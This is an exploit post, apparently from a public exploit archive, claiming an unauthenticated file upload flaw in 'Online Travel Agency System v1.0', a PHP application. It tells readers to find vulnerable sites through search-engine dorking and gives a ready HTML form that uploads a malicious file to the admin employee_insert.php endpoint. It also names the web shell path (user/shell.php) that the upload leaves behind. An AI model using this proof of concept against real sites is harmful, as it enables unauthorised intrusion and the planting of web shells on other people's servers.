============================================================================================================================================= | # Title : Online Travel Agency System v1.0 Remote File Upload Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) | | # Vendor : https://www.sourcecodester.com/online-travel-agency-system-using-php.html | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] The following html code uploads a executable malicious file remotely . [+] Go to the line 8. [+] Set the target site link Save changes and apply . [+] infected file : http://127.0.0.1/php-travel-agency-system-master/admin/employee_insert.php. [+] save code as poc.html . <!DOCTYPE html> <html> <head> <title>Employee Form</title> </head> <body> <h2>Employee Form</h2> <form action="http://127.0.0.1/php-travel-agency-system-master/admin/employee_insert.php" method="post" enctype="multipart/form-data"> <label for="userfile">Profile Picture:</label> <input type="file" id="userfile" name="userfile" required><br><br> <input type="submit" name="employeeform" value="Submit"> </form> </body> </html> [+] http://127.0.0.1/php-travel-agency-system-master/admin/user/shell.php Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ==========================================================================